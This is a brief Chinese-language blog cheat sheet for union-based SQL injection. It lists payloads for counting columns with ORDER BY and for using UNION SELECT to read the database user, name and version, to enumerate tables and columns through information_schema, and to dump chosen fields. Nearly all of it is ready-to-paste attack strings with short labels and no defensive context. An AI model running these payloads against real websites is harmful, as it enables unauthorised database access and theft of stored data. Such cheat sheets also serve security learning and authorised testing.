判断字段行

‘ order by 1,2,3,4,5,6,….. #      #和 – 通用

查看数据库信息:

User() 用户名

Database() 数据库

Version() 版本

‘ union select user(),database(),version #

数据库表名查询

‘ union select 1,2,table_name from information_schema.tables where table_schema=’数据库’ #

数据库字段查询

‘ union select 1,2,column_name from information_schema.columns where table_name=’表名’ #

数据库列查询

‘ union select 字段,字段,字段 from 数据库名.字段名 #

最后修改:2019 年 04 月 06 日 02 : 32 PM
如果觉得我的文章对你有用,请随意赞赏